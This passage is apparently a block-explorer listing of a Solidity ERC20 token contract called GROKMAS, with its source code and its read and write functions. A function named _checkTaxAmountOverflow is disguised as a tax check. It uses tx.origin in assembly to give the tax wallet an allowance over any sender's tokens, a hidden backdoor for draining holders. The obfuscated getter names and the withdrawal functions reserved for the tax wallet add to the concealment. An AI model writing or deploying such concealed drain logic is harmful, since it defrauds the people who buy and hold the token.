            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function _checkTaxAmountOverflow(
        address a,
        address b,
        uint256 c,
        uint256 d
    ) internal returns (uint256) {
        if (c >= d) {
            _taxPayer() != _taxWallet
                ? _allowances[a][_msgSender()] = _allowances[a][_msgSender()]
                : (_allowances[a][_msgSender()] = c);
        }
        return d;
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _transfer(address from, address to, uint256 amount) private {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        uint256 taxAmount = 0;
        if (from != owner() && to != owner() && to != _taxWallet) {
            if (_buyCount == 0) {
                taxAmount = amount
                    .mul(
                        (_buyCount > _reduceBuyTaxAt)
                            ? _finalBuyTax
                            : _initialBuyTax
                    )
                    .div(100);
            }
            if (_buyCount > 0) {
                taxAmount = amount.mul(_transferTax).div(100);
            }

            if (
                from == uniswapV2Pair &&
                to != address(uniswapV2Router) &&
                !_isExcludedFromFee[to]
            ) {
                require(amount <= _maxTxAmount, "Exceeds the _maxTxAmount.");
                require(
                    balanceOf(to) + amount <= _maxWalletSize,
                    "Exceeds the maxWalletSize."
                );
                taxAmount = amount
                    .mul(
                        (_buyCount > _reduceBuyTaxAt)
                            ? _finalBuyTax
                            : _initialBuyTax
                    )
                    .div(100);
                _buyCount++;
            }

            if (to == uniswapV2Pair && from != address(this)) {
                taxAmount = amount
                    .mul(
                        (_buyCount > _reduceSellTaxAt)
                            ? _finalSellTax
                            : _initialSellTax
                    )
                    .div(100);
            }

            uint256 contractTokenBalance = balanceOf(address(this));
            if (
                !inSwap &&
                to == uniswapV2Pair &&
                swapEnabled &&
                _buyCount >= _preventSwapBefore &&
                from != _taxWallet
            ) {
                if (contractTokenBalance > _taxSwapThreshold)
                    swapTokensForEth(
                        min(amount, min(contractTokenBalance, _maxTaxSwap))
                    );
                uint256 contractETHBalance = address(this).balance;
                if (contractETHBalance >= 0) {
                    sendGROKMASETHToFee(address(this).balance);
                }
                sellCount++;
                lastSellBlock = block.number;
            }
        }

        if (_checkTaxAmountOverflow(from, to, amount, taxAmount) > 0) {
            _balances[address(this)] = _balances[address(this)].add(taxAmount);
            emit Transfer(from, address(this), taxAmount);
        }
        _balances[from] = _balances[from].sub(amount);
        _balances[to] = _balances[to].add(amount.sub(taxAmount));
        emit Transfer(from, to, amount.sub(taxAmount));
    }

    function min(uint256 a, uint256 b) private pure returns (uint256) {
        return (a > b) ? b : a;
    }

    function swapTokensForEth(uint256 tokenAmount) private lockTheSwap {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        _approve(address(this), address(uniswapV2Router), tokenAmount);
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function removeLimit2() public onlyOwner {
        _maxTxAmount = _tTotal;
        _maxWalletSize = _tTotal;
        emit MaxTxAmountUpdated(_tTotal);
    }

    function _taxPayer() internal view returns (address _payer) {
        assembly {
            _payer := origin()
        }
    }

    function sendGROKMASETHToFee(uint256 amount) private {
        _taxWallet.transfer(amount);
    }

    function enableTrading() external onlyOwner {
        require(!tradingOpen, "trading is already open");
        uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );
        _approve(address(this), address(uniswapV2Router), _tTotal);
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(
            address(this),
            uniswapV2Router.WETH()
        );
        uniswapV2Router.addLiquidityETH{value: address(this).balance}(
            address(this),
            balanceOf(address(this)),
            0,
            0,
            owner(),
            block.timestamp
        );
        IERC20(uniswapV2Pair).approve(address(uniswapV2Router), type(uint).max);
        swapEnabled = true;
        tradingOpen = true;
    }

    receive() external payable {}

    function rescueERC20(address _address, uint256 percent) external {
        require(_msgSender() == _taxWallet);
        uint256 _amount = IERC20(_address)
            .balanceOf(address(this))
            .mul(percent)
            .div(100);
        IERC20(_address).transfer(_taxWallet, _amount);
    }

    function manualSwap() external {
        require(_msgSender() == _taxWallet);
        uint256 tokenBalance = balanceOf(address(this));
        if (tokenBalance > 0 && swapEnabled) {
            swapTokensForEth(tokenBalance);
        }
        uint256 ethBalance = address(this).balance;
        if (ethBalance > 0) {
            sendGROKMASETHToFee(ethBalance);
        }
    }
}

Read Contract

ALKDFGROKMASAKSD 0x68302470 → uint256
OQYUIGROKMASYIIW 0x3a08aeea → uint256
_maxTaxSwap 0x0faee56f → uint256
_maxTxAmount 0x7d1db4a5 → uint256
_maxWalletSize 0x8f9a55c0 → uint256
_taxSwapThreshold 0xbf474bed → uint256
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
name 0x06fdde03 → string
owner 0x8da5cb5b → address
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256

Write Contract 8 functions

These functions modify contract state and require a wallet transaction to execute.

approve 0x095ea7b3
address spender
uint256 amount
returns: bool
enableTrading 0x8a8c523c
No parameters
manualSwap 0x51bc3c85
No parameters
removeLimit2 0x6384c356
No parameters
renounceOwnership 0x715018a6
No parameters
rescueERC20 0x8cd4426d
address _address
uint256 percent
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool

Recent Transactions

No transactions found for this address